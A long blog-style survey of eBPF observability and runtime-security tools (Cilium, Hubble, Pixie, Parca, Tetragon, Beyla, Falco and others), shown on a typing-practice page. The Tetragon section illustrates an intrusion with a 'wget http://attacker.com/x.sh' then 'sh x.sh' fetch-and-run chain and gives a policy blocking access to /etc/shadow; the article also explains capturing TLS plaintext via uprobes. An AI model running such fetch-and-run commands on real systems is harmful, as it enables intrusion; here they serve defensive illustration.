Skip to content

필사 모드: eBPF Observability 2026 — Pixie / Parca / Cilium Hubble / Tetragon / Beyla / Coroot / Falco Deep Dive

English
0%
정확도 0%
💡 왼쪽 원문을 읽으면서 오른쪽에 따라 써보세요. Tab 키로 힌트를 받을 수 있습니다.
원문 렌더가 준비되기 전까지 텍스트 가이드로 표시합니다.

2026: The Year eBPF Became Infrastructure's Standard Nervous System

Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the de-facto standard in:

- **Networking** — Cilium is the default CNI option on GKE, EKS, and AKS, and it is replacing kube-proxy

- **Observability** — Pixie, Parca, Beyla, and Coroot made "auto-instrumentation without code changes" real

- **Security** — Tetragon and Falco are the de-facto standards for runtime security

- **Scheduling** — sched_ext (CONFIG_SCHED_CLASS_EXT) landed in the Linux mainline at 6.12; Meta and Google run custom schedulers in production

- **Power** — Kepler entered CNCF Incubating and became the de-facto standard for measuring data-center carbon footprint

This post walks the 2026 eBPF landscape top to bottom: what each tool does, why it works that way, and how Korean and Japanese big-tech adopted it.

1. eBPF in 2026 — The Four Domains Where It Won

Let us draw the big picture first. eBPF is solidifying as the standard in four areas simultaneously.

┌──────────────────────────────────────────────────────────────────────────┐

│ eBPF — De-Facto Standards by Domain (2026) │

├──────────────────────────────────────────────────────────────────────────┤

│ Network / CNI │ Cilium (CNCF Graduated 2023) │

│ - Network observ. │ Hubble (sister project) │

│ - kube-proxy repl. │ Cilium kube-proxy replacement │

│ - Service mesh │ Cilium Service Mesh (sidecarless Envoy) │

├──────────────────────────────────────────────────────────────────────────┤

│ Observ. (tracing) │ Pixie (CNCF Sandbox, New Relic-backed / OSS) │

│ Observ. (profiling) │ Parca / Grafana Pyroscope │

│ Observ. (auto-instr.) │ Grafana Beyla / OpenTelemetry eBPF Collector │

│ Observ. (auto-infer) │ Coroot │

│ k8s diagnostics │ Inspektor Gadget (Microsoft, CNCF Sandbox) │

├──────────────────────────────────────────────────────────────────────────┤

│ Security (runtime) │ Falco (CNCF Graduated 2024) / Tetragon (Isovalent) │

│ - Policy signals │ Cilium Tetragon │

│ - Syscall auditing │ Falco │

├──────────────────────────────────────────────────────────────────────────┤

│ Power / Sustainability│ Kepler (CNCF Incubating) │

│ Scheduling │ sched_ext (Linux 6.12+, Meta scx schedulers) │

└──────────────────────────────────────────────────────────────────────────┘

The interesting thing is that all four domains rest on a single technology: "running verified code safely inside the kernel." How that is possible is the next chapter.

2. eBPF Fundamentals — Why You Can "Safely" Extend the Kernel

eBPF stands for extended Berkeley Packet Filter, but its name is far narrower than what it actually is. The essence is "a virtual machine that lets user-space load small programs that the kernel runs, verified, in kernel context."

Traditional kernel-extension options

1. **Kernel modules (`.ko`)** — Powerful but dangerous; a bad module panics the kernel

2. **kprobes / uprobes / tracepoints** — Safe but data collection is limited

3. **systemtap** — Looks like a scripting language, but ultimately compiles to a kernel module

The eBPF approach

User space Kernel space

────────── ────────────

[C source] [eBPF VM]

│ ▲

▼ │

[Clang/LLVM] ──▶ [eBPF bytecode] ──▶ [Verifier]

[JIT compiler]

[native code]

[hook: kprobe, tracepoint, XDP, sched ...]

The heart is the **verifier**. Before loading, every eBPF program is checked for:

- **No infinite loops** — All backward jumps must have an explicit bound (bounded loops, Linux 5.3+)

- **Only valid memory access** — Pointer tracking, range checks

- **Guaranteed termination** — Per-program instruction cap (1M instructions, Linux 5.2+)

- **Only helper functions** — You cannot call arbitrary kernel functions; only whitelisted helpers

Thanks to the verifier, users can write "code that runs in the kernel yet cannot brick the kernel." This is the magic of eBPF.

Lifecycle of an eBPF program

// Hello eBPF (libbpf style)

#include <linux/bpf.h>

#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_openat")

int trace_openat(void *ctx) {

char msg[] = "openat called\n";

bpf_trace_printk(msg, sizeof(msg));

return 0;

}

char LICENSE[] SEC("license") = "GPL";

Compile

clang -O2 -target bpf -c hello.c -o hello.o

Load (with bpftool)

sudo bpftool prog load hello.o /sys/fs/bpf/hello

sudo bpftool prog attach pinned /sys/fs/bpf/hello tracepoint syscalls sys_enter_openat

Read the trace

sudo cat /sys/kernel/debug/tracing/trace_pipe

This tiny example shows the magic: every time openat is called, the kernel runs our verified code. We can track which files any process opens.

3. The CO-RE Revolution — Compile Once, Run Everywhere

The biggest problem with early eBPF was **kernel-version compatibility**. Internal kernel structs differ between versions. For example, some `task_struct` field sits at offset 200 on 5.4, 224 on 5.10, and 248 on 6.5.

So old-school BCC took the approach of "compile at runtime with Clang against the kernel headers." Downsides:

- Every node needs Clang + kernel headers installed (hundreds of MB)

- Startup takes seconds to tens of seconds

- Running a compiler in production gives ops nightmares

How CO-RE works

CO-RE solves this with BTF (BPF Type Format) and libbpf's relocation feature.

At compile time:

eBPF.c ── Clang/LLVM ──▶ BPF bytecode + BTF info (struct-field reference metadata)

At runtime:

Compare against the running kernel's BTF (/sys/kernel/btf/vmlinux)

──▶ libbpf recomputes offsets

──▶ Patches the memory-access instructions in the bytecode

──▶ Passes the verifier and loads

The key macro is `BPF_CORE_READ()`. Old style:

// BCC style (runtime compilation)

struct task_struct *task = (struct task_struct *)bpf_get_current_task();

pid_t ppid;

bpf_probe_read(&ppid, sizeof(ppid), &task->real_parent->tgid);

Modern style:

// CO-RE style (compile once, run anywhere)

struct task_struct *task = (struct task_struct *)bpf_get_current_task();

pid_t ppid = BPF_CORE_READ(task, real_parent, tgid);

The impact of this small change is enormous. **Container image sizes dropped from 100 MB to 5 MB**, and startup is now instantaneous. Every modern eBPF tool — Cilium, Pixie, Tetragon, Inspektor Gadget — is built on CO-RE.

BTF required, headers not

As of 2026, Ubuntu 22.04+, RHEL 9+, Amazon Linux 2023+, and Bottlerocket all ship with BTF by default (`/sys/kernel/btf/vmlinux`). For older kernels, BTFHub (https://github.com/aquasecurity/btfhub) provides external BTF.

4. Pixie — The Definitive Kubernetes Auto-Instrumentation Tool

Pixie is the Kubernetes observability platform that New Relic acquired and open-sourced (Apache 2.0). It is a CNCF Sandbox project and was rumored as an Incubating candidate going into 2026.

What Pixie solves

Traditional APM forces one of these on you:

1. Install an agent on every service (Datadog, New Relic APM)

2. Embed an OpenTelemetry SDK in every service via code

3. Deploy a service-mesh sidecar (Istio, Linkerd)

All three require **code or deployment changes**. Pixie's promise is different. **"Install in your cluster with one YAML, and every flow is visible immediately."**

Architecture

┌──────────────────────────────┐

│ Pixie UI / Pixie CLI │

│ PxL query language (Python-ish) │

└──────────────┬───────────────┘

│ gRPC

┌───────────────▼─────────────────┐

│ Pixie Cloud (optional, self-hostable) │

│ or Pixie Vizier (in-cluster) │

└───────────────┬─────────────────┘

┌────────────────────────────┼────────────────────────────┐

▼ ▼ ▼

┌───────┐ ┌───────┐ ┌───────┐

│ PEM │ │ PEM │ │ PEM │

│ (node)│ │ (node)│ │ (node)│

└─┬─────┘ └─┬─────┘ └─┬─────┘

│ eBPF │ eBPF │ eBPF

▼ ▼ ▼

[kernel traces] [kernel traces] [kernel traces]

PEM = Pixie Edge Module (DaemonSet)

Data is held in node memory for 24 hours only (long-term storage via Iceberg/S3 export)

A PEM runs per node and captures the following automatically:

- HTTP/HTTP2/gRPC requests and responses (headers + body)

- MySQL, PostgreSQL, Redis, Kafka, MongoDB queries

- DNS queries

- TCP/UDP connections, retransmits, RTT

- CPU profiles (perf_event)

TLS is visible

The most impressive bit. **HTTPS traffic is visible.** How? Pixie attaches uprobes to OpenSSL's `SSL_read` / `SSL_write` and observes the plaintext right before encryption and right after decryption.

// Simplified pseudo-code

SEC("uprobe/SSL_write")

int trace_ssl_write(struct pt_regs *ctx) {

void *buf = (void *)PT_REGS_PARM2(ctx);

size_t len = (size_t)PT_REGS_PARM3(ctx);

// Send the first N bytes of buf into a perf buffer

...

}

Go binaries are statically linked, which is trickier. Pixie locates Go's TLS-library symbols (`crypto/tls.(*Conn).Read/Write`) and hooks uprobes on them.

PxL query example

Top 10 slowest HTTP endpoints in the last 5 minutes

df = px.DataFrame(table='http_events', start_time='-5m')

df = df[df.resp_status >= 200]

df.endpoint = df.req_path

df = df.groupby('endpoint').agg(

p50=('latency', px.quantiles(0.50)),

p99=('latency', px.quantiles(0.99)),

count=('latency', px.count),

)

df = df.sort('p99', desc=True).head(10)

px.display(df)

PxL is a Python-flavored DSL, but is actually compiled and executed by a C++ backend. All queries hit the in-memory data on each PEM, so they are fast.

Limits

- **No long-term storage** — Default 24 hours. To keep data longer, export Pixie to OpenTelemetry and ship to another backend (Honeycomb, Tempo, Iceberg)

- **Resource usage** — A PEM typically consumes 1–2 GB of memory per node, which can be heavy on small nodes

- **HTTPS relies on uprobe matching** — Static OpenSSL linking or unusual TLS libraries make capture tricky

Still, Pixie is the definitive showcase of "what eBPF auto-instrumentation can do."

5. Parca — Continuous Profiling

Parca is the open-source continuous-profiling tool from Polar Signals (the company founded by Frederic Branczyk). It is CNCF Sandbox as of 2026.

What "continuous profiling" means

Traditional profiling was reactive: "Something is wrong, so let me run perf record now and analyze." Continuous profiling is **always-on, low-overhead (typically 1%) profiling of every process, stored for later**. Then post-hoc analysis like "memory spiked last Tuesday at 3 PM" becomes possible.

What sets Parca apart

Alternatives:

- perf record → manual, data is huge

- py-spy / pyroscope → per-language agent

- Datadog Continuous Profiler → paid, proprietary

Parca's take:

- parca-agent: a single DaemonSet per node

- eBPF-based 99 Hz stack sampling via perf_event

- One agent for Go, Rust, C/C++, Python, Java, Node.js

- DWARF-based stack unwinding (no libunwind, all in the kernel)

- pprof-compatible format (Parca Server)

The pain of per-node stack sampling

Sampling stacks at 99 Hz means capturing the call stack of the running function 99 times per second on every CPU. The canonical way is to walk the stack pointer (rbp register), but modern compilers omit frame pointers for optimization (`-fomit-frame-pointer`).

Two ways out:

1. **Re-enable frame pointers** — Fedora 38+ and Ubuntu 24.04+ now ship their entire library set with frame pointers enabled (a genuinely big shift)

2. **DWARF-based unwinding** — Read the DWARF eh_frame section to derive the rules for translating the stack pointer. Parca does this **inside eBPF**

Parca pre-loads DWARF unwind info into BPF maps and uses it at sampling time to reconstruct call stacks. This technique was developed by Polar Signals together with the Linux community, and today the Grafana Pyroscope and Datadog profilers all take the same approach.

Flame graphs

The collected stack data is rendered as a flame graph — the visualization Brendan Gregg invented.

┌──────────────────────────────────────┐

│ main (100%) │

├────────────┬─────────────────────────┤

│ http (80%) │ db.query (15%) │

├─────┬──────┼────────┬────────────────┤

│a(40)│b(40) │parse(5)│ exec(10) │

└─────┴──────┴────────┴────────────────┘

Horizontal width = CPU-time share

Up = call depth

Parca vs Pyroscope vs Datadog

| Tool | Open source | Single agent, many langs | DWARF unwinding | Backend |

|------|-------------|--------------------------|-----------------|---------|

| Parca | Apache 2.0 | Yes | Yes | Parca Server (Go) |

| Grafana Pyroscope | AGPL | Partial (separate eBPF agent) | Yes | Pyroscope Server |

| Datadog | Closed | Yes | Yes | SaaS |

| pprof + go pprof | Standard | No | Compiler-dependent | File |

The 2026 trend is convergence on Grafana Pyroscope + Parca-compatible format. pprof has effectively become the standard interchange format.

6. Cilium Hubble — Kubernetes Network Observability

Cilium became CNCF Graduated in 2023, and as of 2026 it is the default option for GKE Dataplane v2, EKS Anywhere, and AKS Advanced. Hubble is Cilium's sister project, observing network flows.

Limits of kube-proxy

The classic kube-proxy uses iptables or IPVS rules for ClusterIP routing. Problems:

- As the service count grows, iptables rules balloon into tens of thousands — O(n) matching per packet (IPVS is hashed but has conntrack overhead)

- No L7 routing

- Poor policy visibility (no way to see why a packet was dropped)

Cilium's approach

TC ingress hook ──▶ eBPF program ──▶ routing / policy / logging

├─▶ DROP / FORWARD / REDIRECT

└─▶ emit event to Hubble

kube-proxy replacement: service mappings live in BPF maps, O(1) lookup per packet

Network policy: L3–L7 evaluated entirely in BPF

Service mesh: Envoy runs sidecarless (per-node)

Hubble UI

Hubble collects the flow events Cilium emits and presents:

- Real-time service-dependency graph

- L7 metrics (HTTP status distribution, method distribution)

- DNS query flows

- Policy violations (with DENY reason included)

Live flow tail

hubble observe --namespace prod --follow

Mar 15 10:23:01.234 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 SYN

Mar 15 10:23:01.235 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 ACK

Mar 15 10:23:01.240 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 HTTP/1.1 GET /v1/users/me (200, 5ms)

L7 stats

hubble observe --http-status 500 --since 5m --output table

Cilium Network Policy example

apiVersion: cilium.io/v2

kind: CiliumNetworkPolicy

metadata:

name: api-only-from-frontend

spec:

endpointSelector:

matchLabels:

app: api

ingress:

- fromEndpoints:

- matchLabels:

app: frontend

toPorts:

- ports:

- port: '8080'

protocol: TCP

rules:

http:

- method: GET

path: '/v1/.*'

- method: POST

path: '/v1/orders'

This policy enforces all the way down to L7 (HTTP method + path). The classic NetworkPolicy cannot do that.

Hubble Timescape

Added in 2025: Hubble flow data is persisted to Iceberg for long-term retention, enabling "what did our traffic patterns look like last week?" analysis. Critical for post-incident forensics.

7. Tetragon — Isovalent's Security Observability

Tetragon is the security-observability / runtime-security tool from Isovalent (now Cisco), the creators of Cilium. Entered CNCF Incubating in 2024.

How it differs from Falco

Falco hooks system calls and evaluates rules. Tetragon is similar but differs as follows:

| Aspect | Falco | Tetragon |

|--------|-------|----------|

| Hook approach | libbpf modern eBPF + kernel module (legacy) | Pure eBPF, CO-RE based |

| Policy language | YAML rules (Sysdig-compatible) | TracingPolicy (CRD) |

| Real-time enforcement | Partial (BPF helper) | Strong (sigkill, override) |

| Process context | Rich | Rich + parent / grandparent / exec ancestry |

| k8s integration | Good | Very strong (auto-attaches Pod metadata) |

What real-time enforcement means

Tetragon can issue SIGKILL to a violating process via the BPF helper `bpf_send_signal()`. Meaning: this is not "detect then notify" — it is "detect and block in the same breath."

apiVersion: cilium.io/v1alpha1

kind: TracingPolicy

metadata:

name: block-sensitive-file-access

spec:

kprobes:

- call: 'security_file_open'

syscall: false

args:

- index: 0

type: 'file'

selectors:

- matchArgs:

- index: 0

operator: 'Prefix'

values:

- '/etc/shadow'

- '/etc/passwd'

matchActions:

- action: 'Sigkill'

Once this policy is in place, the instant any process tries to open `/etc/shadow`, SIGKILL fires from inside the kernel. There is no user-space agent waking up to make a decision. This works because verified code runs directly inside the kernel.

Process ancestry

Another Tetragon highlight: every event can trace "how this process came to exist."

process sshd (pid 1234, uid 0)

└─ bash (pid 1235, uid 0)

└─ wget http://attacker.com/x.sh (pid 1240, uid 0)

└─ sh x.sh (pid 1241, uid 0)

└─ /tmp/x (pid 1245, uid 0) <- violation

The ancestry is built by walking `task_struct->real_parent` in eBPF. In incident analysis, you can immediately see "where this small violation actually started."

8. BCC + bpftrace — The Classics for Ad-Hoc Tracing

If the tools above are "production daemons," BCC and bpftrace are the "engineer SSHes in and runs them directly" tools. They became standard after Brendan Gregg's book "BPF Performance Tools" (2019).

BCC vs bpftrace

- **BCC**: A larger framework with Python or C++ wrappers. Lots of complex tools (`opensnoop`, `execsnoop`, `biolatency`, `tcplife`, ... 200+ tools)

- **bpftrace**: An awk-style one-line DSL. Lets you trace on the spot

bpftrace one-liner magic

1) Which process opens which file (3 seconds)

sudo bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s opens %s\n", comm, str(args->filename)); }' -c 'sleep 3'

2) Disk-I/O latency histogram

sudo bpftrace -e '

kprobe:vfs_read { @start[tid] = nsecs; }

kretprobe:vfs_read /@start[tid]/ {

@ns = hist(nsecs - @start[tid]);

delete(@start[tid]);

}

'

3) Which functions are called most (10 seconds)

sudo bpftrace -e 'profile:hz:99 { @[kstack(3)] = count(); }' -c 'sleep 10' | head -20

4) Where TCP retransmits are going

sudo bpftrace -e '

kprobe:tcp_retransmit_skb {

$sk = (struct sock *)arg0;

printf("retransmit %s\n", ntop($sk->__sk_common.skc_daddr));

}

'

BCC's standard toolset

After installing `bcc-tools` (Ubuntu/Debian) or `bpftrace` (CO-RE build), you can use these from `/usr/sbin/` or `/usr/share/bcc/tools/`:

Which processes are starting

sudo execsnoop-bpfcc

Which files are being opened

sudo opensnoop-bpfcc

TCP connection lifetimes

sudo tcplife-bpfcc

Block-I/O latency histogram

sudo biolatency-bpfcc

Top CPU consumers

sudo profile-bpfcc 10

Why these tools matter

Pixie, Parca, and Hubble above are "always-on" tools. BCC/bpftrace are the "give me an answer right now during this incident" tools. You need both.

Brendan Gregg's "Systems Performance" (2nd ed., 2020) and "BPF Performance Tools" (2019) are the canonical references for this space.

9. OpenTelemetry eBPF Collector + Grafana Beyla — Standardizing Auto-Instrumentation

OpenTelemetry is the CNCF observability standard. In 2025, eBPF-based auto-instrumentation solidified along two paths.

OpenTelemetry eBPF Collector

opentelemetry-ebpf is an official OpenTelemetry component, driven primarily by Splunk. It auto-collects:

- Network-flow metrics (kprobe based)

- DNS, TCP, UDP stats

- Pod/Service/Workload labeling (k8s integration)

It exports OTLP, so any backend (Tempo, Jaeger, Honeycomb, Datadog) can consume it.

Grafana Beyla

Beyla is Grafana Labs' Go-based eBPF auto-instrumentation agent. GA in 2024. Features:

- Auto-recognizes HTTP, gRPC, SQL, Redis traffic via uprobes

- Captures plaintext from TLS traffic by hooking OpenSSL/Go TLS functions

- Extracts distributed-trace context (W3C traceparent)

- Exports to OTLP, Prometheus, Mimir

Plain run (pick the process to follow via BEYLA_EXECUTABLE_NAME)

BEYLA_EXECUTABLE_NAME=myapp \

BEYLA_PROMETHEUS_PORT=9090 \

BEYLA_OPEN_PORT=8080 \

sudo beyla

DaemonSet in k8s

apiVersion: apps/v1

kind: DaemonSet

metadata:

name: beyla

spec:

template:

spec:

hostPID: true # to see processes outside this container

containers:

- name: beyla

image: grafana/beyla:latest

securityContext:

privileged: true # simplification; really only CAP_SYS_ADMIN + CAP_BPF needed

env:

- name: BEYLA_DISCOVERY_SERVICES

value: 'k8s:.*' # auto-discover every k8s service

- name: BEYLA_OTEL_ENDPOINT

value: 'http://otel-collector:4318'

Beyla vs Pixie

| Aspect | Beyla | Pixie |

|--------|-------|-------|

| Backed by | Grafana Labs | New Relic |

| License | Apache 2.0 | Apache 2.0 |

| Data model | OTLP (standard) | PxL queries (custom) |

| Backend | Tempo, Jaeger, any OTLP backend | Pixie Vizier + export |

| Strength | OTel-ecosystem integration | In-memory queries, rich UI |

The 2026 direction is clear. **Auto-instrumentation is, in practice, all converging on OpenTelemetry**, and Beyla / Pixie / Coroot are paving that road.

10. Coroot — Auto-Inferred Observability

Coroot is a relatively new project that surfaced in 2023, but its "auto-inferred" observability approach has rapidly caught on. Open source (Apache 2.0).

What "auto-inferred" means

Traditional observability forces a human to define:

- Which metrics constitute an SLO

- Which services depend on which other services

- What the alerting thresholds are

- Which log patterns are errors

Coroot's promise: **"observe all of that with eBPF and infer the rest automatically."**

What Coroot infers automatically:

1. Service-dependency graph (from network flows)

2. SLO candidates (from HTTP/gRPC traffic analysis)

3. Database query grouping (auto-normalized, auto-classified)

4. Alert candidates (based on anomaly detection)

5. Cost / resource-efficiency analysis

Architecture

Coroot also runs per-node agents (coroot-node-agent). Those agents capture via eBPF:

- TCP connections, RTT, retransmits

- HTTP/HTTPS (TLS captured with uprobes)

- DB protocols (PostgreSQL, MySQL, Redis, MongoDB)

- File I/O, CPU use

The collected data is stored by Coroot Server (Go) on Prometheus and ClickHouse backends.

What you see

Open Coroot's UI and you immediately see things like:

- A "frontend -> api -> postgres -> s3" dependency graph

- Per-edge RPS, p99 latency, error rate

- "Among queries hitting postgres, SELECT * FROM users WHERE ... is the slowest at p99 200 ms"

- "Frontend node ip-10-0-1-23 is 30% higher CPU than baseline"

All automatic. Nobody built those dashboards. Especially useful for small teams.

Limits

Coroot trades "standard" for "convenience." Its backend is Prometheus + ClickHouse, which is good for data portability, but its data model is custom — so organizations already invested in Datadog or Honeycomb face additional learning.

11. Inspektor Gadget / Kepler / Falco — A Small but Important Trio

Inspektor Gadget (Microsoft, CNCF Sandbox)

Inspektor Gadget is a "collection of eBPF-built k8s debugging tools" sponsored by Microsoft. It runs as a kubectl plugin.

kubectl gadget trace exec # track new processes across the whole cluster

kubectl gadget trace open # which files are being opened

kubectl gadget trace dns # DNS query flows

kubectl gadget snapshot socket # snapshot open sockets on every node

kubectl gadget top file # top file-I/O users

Internally it began as a wrapper around BCC tools and has evolved into its own IG (Inspektor Gadget) framework, CO-RE based.

Kepler (Sustainable Computing)

Kepler (Kubernetes Efficient Power Level Exporter) started in CNCF Sandbox and was promoted to Incubating in 2025. It measures per-container power usage.

The method is clever. It uses CPU counters (RAPL: Running Average Power Limit), disk I/O, and network I/O, attributes them to containers via eBPF, and then a machine-learning model estimates power in watts.

Exposed as Prometheus metrics

kepler_container_joules_total{container_name="myapp"} 12345.6

kepler_container_other_joules_total{...}

These metrics feed Cloud Carbon Footprint calculators that translate to "how many kg of CO2 did this service produce this month." Directly tied to ESG reporting and FinOps.

Falco (CNCF Graduated)

Falco became CNCF Graduated in 2024. The essence is "a runtime-security engine that hooks system calls and evaluates rules."

Excerpt of falco_rules.yaml

- rule: Write below etc

desc: an attempt to write to any file below /etc

condition: write_etc_common

output: 'File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname)'

priority: ERROR

tags: [filesystem, mitre_persistence]

Falco's default driver is now modern eBPF probe (libbpf-based); the legacy kernel-module driver is deprecated. The "Falco Rules" official repository ships 600+ rules covering most MITRE ATT&CK categories.

Tetragon and Falco are competitors but are often deployed together. Falco has the rich rule library, Tetragon has the strong real-time enforcement.

12. eBPF for Windows / macOS — Beyond Linux

eBPF is no longer a Linux-only technology.

eBPF for Windows (Microsoft)

Microsoft kicked off the eBPF-for-Windows project in 2021. As of 2026, a stable version ships in Windows Server 2025 and Azure has started production use.

Linux-compatible:

- libbpf-compatible API

- The same .o file (mostly) loads on both

- Core types: BPF_PROG_TYPE_XDP, BPF_PROG_TYPE_BIND, BPF_PROG_TYPE_CGROUP_SOCK, ...

Differences:

- Verifier is PREVAIL (a separate Microsoft implementation, academically verified)

- JIT is based on Microsoft uBPF

- Hook points center on NDIS (the network driver stack)

Azure's security team runs Tetragon-style hooks on Windows VMs, and Cilium's Windows-node support is in progress. Not yet a game-changer, but the perception of "eBPF is Linux-only" is fading fast.

macOS and Apple Silicon

Apple does not officially support eBPF. macOS has kqueue, DTrace, and the Endpoint Security API filling similar roles. That said, since 2025 it has become commonplace to run eBPF tools inside Linux VMs on Apple Silicon (Lima, Tart, OrbStack), and Asahi Linux has solid ARM eBPF support.

There are experimental unofficial ports (mac-bpf, ebpf-darwin), but no production use to speak of. On macOS, the right answer is running eBPF inside a Linux VM.

13. Korean / Japanese Adoption — Toss, Kakao, LINE, Mercari

Toss — Cilium + Hubble + Tetragon as a Company Standard

Toss announced at SLASH 2024 (their developer conference) that their infrastructure is EKS + Cilium based. The main driver was iptables-rule explosion in kube-proxy. After adopting Cilium:

- iptables rules per node dropped from 10,000+ to nearly zero

- Service-discovery latency p99 dropped meaningfully

- Hubble visualized microservice dependencies

- Tetragon does runtime blocking in some security-sensitive domains

The SLASH 2024 talk is publicly available on YouTube.

Kakao — eBPF-Based In-House Tracing

Kakao presented an in-house eBPF-based tracing system at ifkakao 2024. The core is BCC plus a custom collector that auto-captures RPC calls and database queries. They evaluated Pixie but chose to build it in-house.

LINE / LY Corporation

LINE has shared eBPF use cases multiple times on the LINE Engineering blog. They lean on bpftrace heavily for analyzing TCP retransmits in messenger traffic and network-debugging Kafka clusters.

Mercari — Continuous Profiling

Mercari shared on the Mercari Engineering blog in 2024 how they put Grafana Pyroscope (Parca-compatible) into production. They found CPU hotspots across 100+ Go microservices and cut EC2 costs as a result.

Yahoo Japan / LY Corporation

Yahoo! JAPAN has been operating eBPF-based network observability since 2023. A custom collector captures every TCP flow on every node and stores it in ClickHouse.

14. An Adoption Decision Guide — What to Use When

Finally, the practical decision guide. Do not "adopt everything at once" — go stage by stage.

Stage 1 — Do you need network visibility?

Start with **Cilium + Hubble**. Swapping the CNI is the biggest short-term change, but the biggest long-term payoff. If this is a new cluster, just go Cilium.

Stage 2 — You have no APM, or it is too expensive

Install **Beyla** (OTel-friendly) or **Pixie** (in-memory queries) on one cluster. Within a month you will see "which services are slow."

Stage 3 — You need profiling data

Install **Parca** or **Grafana Pyroscope**. For Go / Rust / Java workloads, CPU hotspots become instantly visible. Especially effective on AI infrastructure where CPU and memory are expensive.

Stage 4 — You need runtime security

Start with **Falco** — rich ruleset, easy install. If you genuinely need real-time blocking, add **Tetragon**.

Stage 5 — You debug k8s often

Install **Inspektor Gadget** as a kubectl plugin. `kubectl gadget trace exec` and friends become daily workflow.

Stage 6 — You need resource / power monitoring

**Kepler** for power. **Coroot** for an auto-inferred dashboard.

Stage 7 — Troubleshooting tools

**BCC + bpftrace** should always be installed for on-the-spot debugging over SSH.

Anti-patterns

- **Install every tool** — Resource overhead stacks up; ops burden grows. Add 100–500 MB per node memory per tool

- **Old kernels without CO-RE** — Linux below 5.4 means upgrading is priority #1

- **Kernels without BTF** — If `/sys/kernel/btf/vmlinux` is missing, you depend on BTFHub

- **Reckless privileged DaemonSets** — Grant CAP_BPF, CAP_PERFMON, CAP_NET_ADMIN explicitly, avoid root

- **Turning on auto-blocking too quickly** — A misconfigured Tetragon Sigkill action will kill perfectly healthy processes. Run in alert mode first, validate patterns, then switch to block mode

Closing — Why eBPF Became the Default Infrastructure Tool

eBPF's explosive growth has clear reasons:

1. **CO-RE made ops easy** — No kernel headers, no compilers required

2. **Safety** — The isolation the verifier guarantees is something kernel modules never could

3. **Performance** — Hook cost is typically under 100 ns, so you can leave it on in production

4. **Standardization** — OpenTelemetry converged the data model, CNCF validates the tools

5. **Polyglot** — A single agent observes Go, Rust, C++, Python, and Java

An infrastructure engineer in 2026 not knowing eBPF is like an infrastructure engineer in 2016 not knowing Docker. Start by reading one book (Liz Rice's "Learning eBPF" or Brendan Gregg's "BPF Performance Tools"), then drop Cilium + Hubble + Beyla onto one cluster.

> "We instrumented production with eBPF and discovered three latency issues that had been there for two years. We never had to add a single log line." — Lyft Engineering, 2024

References

- [eBPF official site](https://ebpf.io/)

- [eBPF Foundation](https://ebpf.foundation/)

- [Linux Kernel BPF docs](https://docs.kernel.org/bpf/)

- [libbpf on GitHub](https://github.com/libbpf/libbpf)

- [bpftool on GitHub](https://github.com/libbpf/bpftool)

- [CO-RE guide — Andrii Nakryiko's blog](https://nakryiko.com/posts/bpf-portability-and-co-re/)

- [Liz Rice — Learning eBPF (O'Reilly, 2023)](https://www.oreilly.com/library/view/learning-ebpf/9781098135119/)

- [Brendan Gregg — BPF Performance Tools (Addison-Wesley, 2019)](https://www.brendangregg.com/bpf-performance-tools-book.html)

- [Brendan Gregg — Systems Performance, 2nd ed.](https://www.brendangregg.com/systems-performance-2nd-edition-book.html)

- [Pixie](https://px.dev/)

- [Pixie on GitHub](https://github.com/pixie-io/pixie)

- [Parca](https://www.parca.dev/)

- [Polar Signals blog](https://www.polarsignals.com/blog)

- [Cilium](https://cilium.io/)

- [Hubble on GitHub](https://github.com/cilium/hubble)

- [Tetragon](https://tetragon.io/)

- [Tetragon on GitHub](https://github.com/cilium/tetragon)

- [BCC on GitHub](https://github.com/iovisor/bcc)

- [bpftrace on GitHub](https://github.com/bpftrace/bpftrace)

- [OpenTelemetry eBPF on GitHub](https://github.com/open-telemetry/opentelemetry-ebpf)

- [Grafana Beyla](https://grafana.com/oss/beyla-ebpf/)

- [Grafana Beyla on GitHub](https://github.com/grafana/beyla)

- [Grafana Pyroscope](https://grafana.com/oss/pyroscope/)

- [Coroot](https://coroot.com/)

- [Coroot on GitHub](https://github.com/coroot/coroot)

- [Inspektor Gadget](https://www.inspektor-gadget.io/)

- [Kepler](https://sustainable-computing.io/)

- [Kepler on GitHub](https://github.com/sustainable-computing-io/kepler)

- [Falco](https://falco.org/)

- [Falco on GitHub](https://github.com/falcosecurity/falco)

- [eBPF for Windows on GitHub](https://github.com/microsoft/ebpf-for-windows)

- [Asahi Linux](https://asahilinux.org/)

- [sched_ext](https://sched-ext.com/)

- [BTFHub — BTF for old kernels](https://github.com/aquasecurity/btfhub)

- [Toss SLASH 24 — Cilium adoption talk](https://toss.tech/slash-24)

- [LINE Engineering blog](https://engineering.linecorp.com/en)

- [Mercari Engineering blog](https://engineering.mercari.com/en/)

- [eBPF Summit](https://ebpf.io/summit-2024/)

- [CNCF Landscape — Observability and Analysis](https://landscape.cncf.io/)

- [Isovalent (Cisco) blog](https://isovalent.com/blog/)

현재 단락 (1/464)

Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the d...

작성 글자: 0원문 글자: 28,165작성 단락: 0/464